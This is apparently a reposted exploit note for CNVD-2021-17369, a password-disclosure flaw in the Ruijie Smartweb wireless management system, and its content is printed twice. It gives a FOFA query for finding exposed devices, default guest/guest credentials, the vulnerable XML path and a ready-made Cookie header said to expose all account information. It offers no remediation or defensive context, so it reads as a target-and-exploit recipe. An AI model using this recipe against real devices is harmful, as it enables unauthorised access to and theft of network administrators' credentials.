# CNVD-2021-17369 銳捷Smartweb管理系統 密碼信息洩露漏洞/en
==FOFA==
title="无线smartWeb--登录页面"
==Default guest password==
guest/guest
==Vulnerability location==
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
==Exploit==
Cookie add the following
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
Can get all account information
==Reference==
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
==FOFA==
title="无线smartWeb--登录页面"
==Default guest password==
guest/guest
==Vulnerability location==
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
==Exploit==
Cookie add the following
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
Can get all account information
==Reference==
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容